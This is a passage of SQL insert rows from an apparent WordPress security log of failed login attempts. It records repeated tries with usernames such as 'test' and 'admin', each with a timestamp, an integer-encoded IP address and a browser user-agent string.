(103441, 1499681576.175741, 1, 'loginFailInvalidUsername', 'test', 0, 1560273001, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103442, 1499681577.233901, 1, 'loginFailInvalidUsername', 'test', 0, 1560273001, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103443, 1499691454.620150, 1, 'loginFailInvalidUsername', 'test', 0, 1741824102, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103444, 1499691456.087836, 1, 'loginFailInvalidUsername', 'test', 0, 1741824102, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103445, 1499691511.951166, 1, 'loginFailInvalidUsername', 'test', 0, 1342978817, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103446, 1499691534.565950, 1, 'loginFailInvalidUsername', 'test', 0, 1342978817, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103447, 1499692280.922292, 1, 'loginFailInvalidUsername', 'test', 0, 1333864093, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103448, 1499694191.360395, 1, 'loginFailInvalidUsername', 'test', 0, 3732283033, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103449, 1499694192.939423, 1, 'loginFailInvalidUsername', 'test', 0, 3732283033, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103450, 1499694520.315997, 1, 'loginFailInvalidUsername', 'test', 0, 1571560994, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103451, 1499694521.379058, 1, 'loginFailInvalidUsername', 'test', 0, 1571560994, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103452, 1499695554.401019, 1, 'loginFailInvalidUsername', 'test', 0, 1241121248, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103453, 1499695555.492658, 1, 'loginFailInvalidUsername', 'test', 0, 1241121248, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103454, 1499697679.825259, 1, 'loginFailInvalidUsername', 'test', 0, 24802795, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103455, 1499697681.570228, 1, 'loginFailInvalidUsername', 'test', 0, 24802795, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103456, 1499698232.969573, 1, 'loginFailInvalidUsername', 'test', 0, 657867090, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103457, 1499698235.061575, 1, 'loginFailInvalidUsername', 'test', 0, 657867090, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103458, 1499698375.610262, 1, 'loginFailInvalidUsername', 'test', 0, 1781762660, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103459, 1499698376.779178, 1, 'loginFailInvalidUsername', 'test', 0, 1781762660, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103460, 1499698955.863460, 1, 'loginFailInvalidUsername', 'test', 0, 3292351275, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103461, 1499698957.380363, 1, 'loginFailInvalidUsername', 'test', 0, 3292351275, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103462, 1499702176.961073, 1, 'loginFailInvalidUsername', 'test', 0, 3308582543, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103463, 1499702178.027511, 1, 'loginFailInvalidUsername', 'test', 0, 3308582543, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103464, 1499706073.258474, 1, 'loginFailInvalidUsername', 'test', 0, 3306897147, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103465, 1499706075.005096, 1, 'loginFailInvalidUsername', 'test', 0, 3306897147, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103466, 1499706603.346500, 1, 'loginFailInvalidUsername', 'test', 0, 1887854844, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103467, 1499706605.011273, 1, 'loginFailInvalidUsername', 'test', 0, 1887854844, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103468, 1499708317.066627, 1, 'loginFailInvalidUsername', 'test', 0, 701311595, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103469, 1499708328.898353, 1, 'loginFailInvalidUsername', 'test', 0, 701311595, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103470, 1499710670.493407, 1, 'loginFailInvalidUsername', 'test', 0, 1395976121, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103471, 1499710671.649184, 1, 'loginFailInvalidUsername', 'test', 0, 1395976121, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103472, 1499711953.478312, 1, 'loginFailInvalidUsername', 'test', 0, 1459283098, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103473, 1499711954.676608, 1, 'loginFailInvalidUsername', 'test', 0, 1459283098, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103474, 1499713585.382100, 1, 'loginFailInvalidUsername', 'test', 0, 3000831087, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103475, 1499713586.773989, 1, 'loginFailInvalidUsername', 'test', 0, 3000831087, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103476, 1499724466.821968, 1, 'loginFailValidUsername', 'admin', 1, 3526612805, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(103477, 1499725160.810143, 1, 'loginFailInvalidUsername', 'test', 0, 1768453524, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103478, 1499725161.854994, 1, 'loginFailInvalidUsername', 'test', 0, 1768453524, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103479, 1499726576.599712, 1, 'loginFailInvalidUsername', 'test', 0, 2946418971, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103480, 1499726578.227960, 1, 'loginFailInvalidUsername', 'test', 0, 2946418971, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103481, 1499726933.305699, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.14.61 (KHTML, like Gecko) Chrome/53.6.0234.5962 Safari/534.53'),
(103482, 1499727224.364716, 1, 'loginFailInvalidUsername', 'test', 0, 1892355369, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103483, 1499727225.854103, 1, 'loginFailInvalidUsername', 'test', 0, 1892355369, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103484, 1499727561.963050, 1, 'loginFailInvalidUsername', 'test', 0, 3138536518, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103485, 1499727563.348980, 1, 'loginFailInvalidUsername', 'test', 0, 3138536518, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103486, 1499727757.013330, 1, 'loginFailInvalidUsername', 'test', 0, 1812380312, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103487, 1499727758.161812, 1, 'loginFailInvalidUsername', 'test', 0, 1812380312, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103488, 1499734210.924378, 1, 'loginFailInvalidUsername', 'test', 0, 1410847463, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103489, 1499734623.999097, 1, 'loginFailInvalidUsername', 'test', 0, 1028806899, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103490, 1499734625.636244, 1, 'loginFailInvalidUsername', 'test', 0, 1028806899, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103491, 1499738745.957166, 1, 'loginFailInvalidUsername', 'test', 0, 1645581817, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103492, 1499738747.303511, 1, 'loginFailInvalidUsername', 'test', 0, 1645581817, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103493, 1499740244.502713, 1, 'loginFailInvalidUsername', 'test', 0, 245877264, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103494, 1499740245.983547, 1, 'loginFailInvalidUsername', 'test', 0, 245877264, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103495, 1499741324.154271, 1, 'loginFailInvalidUsername', 'test', 0, 1590451502, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103496, 1499741325.347654, 1, 'loginFailInvalidUsername', 'test', 0, 1590451502, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103497, 1499745448.684949, 1, 'loginFailInvalidUsername', 'test', 0, 1578443392, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103498, 1499745449.649471, 1, 'loginFailInvalidUsername', 'test', 0, 1578443392, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103499, 1499745558.595694, 1, 'loginFailInvalidUsername', 'test', 0, 3705789221, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103500, 1499745560.047774, 1, 'loginFailInvalidUsername', 'test', 0, 3705789221, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103501, 1499746334.473490, 1, 'loginFailInvalidUsername', 'test', 0, 1321684459, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103502, 1499747779.964210, 1, 'loginFailInvalidUsername', 'test', 0, 1227113202, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103503, 1499747781.326216, 1, 'loginFailInvalidUsername', 'test', 0, 1227113202, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103504, 1499752168.694454, 1, 'loginFailInvalidUsername', 'test', 0, 3680243721, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103505, 1499752170.323631, 1, 'loginFailInvalidUsername', 'test', 0, 3680243721, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103506, 1499759985.073533, 1, 'loginFailInvalidUsername', 'test', 0, 694534886, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103507, 1499759986.225429, 1, 'loginFailInvalidUsername', 'test', 0, 694534886, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103508, 1499763030.026090, 1, 'loginFailInvalidUsername', 'test', 0, 1497371688, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103509, 1499763031.024803, 1, 'loginFailInvalidUsername', 'test', 0, 1497371688, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103510, 1499763072.703885, 1, 'loginFailInvalidUsername', 'test', 0, 2981638491, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103511, 1499763074.228550, 1, 'loginFailInvalidUsername', 'test', 0, 2981638491, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103512, 1499763513.991719, 1, 'loginFailInvalidUsername', 'test', 0, 2967382402, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103513, 1499763515.110287, 1, 'loginFailInvalidUsername', 'test', 0, 2967382402, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103514, 1499764076.903855, 1, 'loginFailInvalidUsername', 'test', 0, 1477195351, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103515, 1499764077.921870, 1, 'loginFailInvalidUsername', 'test', 0, 1477195351, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103516, 1499764182.424323, 1, 'loginFailInvalidUsername', 'test', 0, 2187978002, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103517, 1499764184.287492, 1, 'loginFailInvalidUsername', 'test', 0, 2187978002, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103518, 1499769318.125945, 1, 'loginFailInvalidUsername', 'test', 0, 1731873530, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103519, 1499769319.610046, 1, 'loginFailInvalidUsername', 'test', 0, 1731873530, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103520, 1499770580.253707, 1, 'loginFailInvalidUsername', 'test', 0, 3157456204, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103521, 1499770581.370325, 1, 'loginFailInvalidUsername', 'test', 0, 3157456204, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103522, 1499772103.335115, 1, 'loginFailInvalidUsername', 'test', 0, 708674819, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103523, 1499772104.974701, 1, 'loginFailInvalidUsername', 'test', 0, 708674819, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103524, 1499773102.006517, 1, 'loginFailInvalidUsername', 'test', 0, 37529501, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103525, 1499773103.405524, 1, 'loginFailInvalidUsername', 'test', 0, 37529501, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103526, 1499774370.664324, 1, 'loginFailInvalidUsername', 'test', 0, 1756358087, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103527, 1499774371.948776, 1, 'loginFailInvalidUsername', 'test', 0, 1756358087, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103528, 1499774492.973361, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 6.0; rv:45.64.01) Gecko/20152037 Firefox/45.64.01'),
(103529, 1499774762.437579, 1, 'loginFailInvalidUsername', 'test', 0, 533313106, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103530, 1499774763.531315, 1, 'loginFailInvalidUsername', 'test', 0, 533313106, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103531, 1499776538.087857, 1, 'loginFailInvalidUsername', 'test', 0, 87497983, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103532, 1499776539.193767, 1, 'loginFailInvalidUsername', 'test', 0, 87497983, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103533, 1499776667.645163, 1, 'loginFailInvalidUsername', 'test', 0, 3010035227, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103534, 1499776669.079775, 1, 'loginFailInvalidUsername', 'test', 0, 3010035227, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103535, 1499777587.072508, 1, 'loginFailInvalidUsername', 'test', 0, 698435692, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103536, 1499777588.446994, 1, 'loginFailInvalidUsername', 'test', 0, 698435692, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103537, 1499778964.519149, 1, 'loginFailInvalidUsername', 'test', 0, 1502264417, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103538, 1499778965.579193, 1, 'loginFailInvalidUsername', 'test', 0, 1502264417, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103539, 1499779975.151724, 1, 'loginFailInvalidUsername', 'test', 0, 19448670, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103540, 1499779976.684274, 1, 'loginFailInvalidUsername', 'test', 0, 19448670, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103541, 1499786579.661157, 1, 'loginFailInvalidUsername', 'test', 0, 1209773993, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103542, 1499786580.893996, 1, 'loginFailInvalidUsername', 'test', 0, 1209773993, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103543, 1499786732.525105, 1, 'loginFailInvalidUsername', 'test', 0, 1473798636, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103544, 1499786734.728745, 1, 'loginFailInvalidUsername', 'test', 0, 1473798636, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103545, 1499788092.779211, 1, 'loginFailInvalidUsername', 'test', 0, 1326068261, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103546, 1499789778.334472, 1, 'loginFailInvalidUsername', 'test', 0, 1488164905, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103547, 1499789779.280140, 1, 'loginFailInvalidUsername', 'test', 0, 1488164905, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103548, 1499790969.800026, 1, 'loginFailInvalidUsername', 'test', 0, 3006594428, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103549, 1499790971.393849, 1, 'loginFailInvalidUsername', 'test', 0, 3006594428, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103550, 1499793423.273317, 1, 'loginFailInvalidUsername', 'test', 0, 1548501513, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103551, 1499793424.347978, 1, 'loginFailInvalidUsername', 'test', 0, 1548501513, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103552, 1499793898.154799, 1, 'loginFailInvalidUsername', 'test', 0, 1730749605, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103553, 1499793904.178839, 1, 'loginFailInvalidUsername', 'test', 0, 1730749605, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103554, 1499802638.466494, 1, 'loginFailInvalidUsername', 'test', 0, 3413133493, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103555, 1499802640.033724, 1, 'loginFailInvalidUsername', 'test', 0, 3413133493, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103556, 1499803250.089469, 1, 'loginFailInvalidUsername', 'test', 0, 3140913718, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103557, 1499803251.557501, 1, 'loginFailInvalidUsername', 'test', 0, 3140913718, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103558, 1499804457.501709, 1, 'loginFailInvalidUsername', 'test', 0, 3247852545, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103559, 1499804458.570194, 1, 'loginFailInvalidUsername', 'test', 0, 3247852545, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103560, 1499807341.152149, 1, 'loginFailInvalidUsername', 'test', 0, 3245049544, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103561, 1499807342.261316, 1, 'loginFailInvalidUsername', 'test', 0, 3245049544, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103562, 1499809304.852513, 1, 'loginFailInvalidUsername', 'test', 0, 1371582420, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103563, 1499809305.991418, 1, 'loginFailInvalidUsername', 'test', 0, 1371582420, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103564, 1499809617.929396, 1, 'loginFailInvalidUsername', 'test', 0, 792007333, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103565, 1499812126.106752, 1, 'loginFailInvalidUsername', 'test', 0, 1240951517, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103566, 1499812127.399815, 1, 'loginFailInvalidUsername', 'test', 0, 1240951517, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103567, 1499814724.729252, 1, 'loginFailInvalidUsername', 'test', 0, 1981451970, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103568, 1499814726.086212, 1, 'loginFailInvalidUsername', 'test', 0, 1981451970, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103569, 1499816748.979111, 1, 'loginFailInvalidUsername', 'test', 0, 1302628173, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103570, 1499816749.961033, 1, 'loginFailInvalidUsername', 'test', 0, 1302628173, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103571, 1499817956.148193, 1, 'loginFailInvalidUsername', 'test', 0, 1308501163, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103572, 1499817957.223831, 1, 'loginFailInvalidUsername', 'test', 0, 1308501163, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103573, 1499818437.418139, 1, 'loginFailInvalidUsername', 'test', 0, 3321488109, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103574, 1499818504.684116, 1, 'loginFailInvalidUsername', 'test', 0, 1849084337, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103575, 1499818506.534426, 1, 'loginFailInvalidUsername', 'test', 0, 1849084337, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103576, 1499820446.049304, 1, 'loginFailInvalidUsername', 'test', 0, 1326228420, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103577, 1499821021.726881, 1, 'loginFailInvalidUsername', 'test', 0, 3032431876, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103578, 1499821024.561135, 1, 'loginFailInvalidUsername', 'test', 0, 3032431873, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103579, 1499822009.338055, 1, 'loginFailInvalidUsername', 'test', 0, 2958474165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103580, 1499822010.311134, 1, 'loginFailInvalidUsername', 'test', 0, 2958474165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103581, 1499822221.615408, 1, 'loginFailInvalidUsername', 'test', 0, 1571300011, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103582, 1499822226.894081, 1, 'loginFailInvalidUsername', 'test', 0, 1571300011, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103583, 1499822750.253533, 1, 'loginFailInvalidUsername', 'test', 0, 387737736, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103584, 1499822751.411047, 1, 'loginFailInvalidUsername', 'test', 0, 387737736, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103585, 1499823116.808367, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_29_76) AppleWebKit/531.70.17 (KHTML, like Gecko) Chrome/55.1.6919.1647 Safari/532.00 Edge/36.04683'),
(103586, 1499825134.648892, 1, 'loginFailInvalidUsername', 'test', 0, 831556195, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103587, 1499825139.873154, 1, 'loginFailInvalidUsername', 'test', 0, 831556195, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103588, 1499828071.649648, 1, 'loginFailInvalidUsername', 'test', 0, 1733481319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103589, 1499828072.938333, 1, 'loginFailInvalidUsername', 'test', 0, 1733481319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103590, 1499831090.235827, 1, 'loginFailValidUsername', 'admin', 1, 3526612805, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(103591, 1499831338.633273, 1, 'loginFailInvalidUsername', 'test', 0, 1483647016, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103592, 1499831339.633050, 1, 'loginFailInvalidUsername', 'test', 0, 1483647016, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
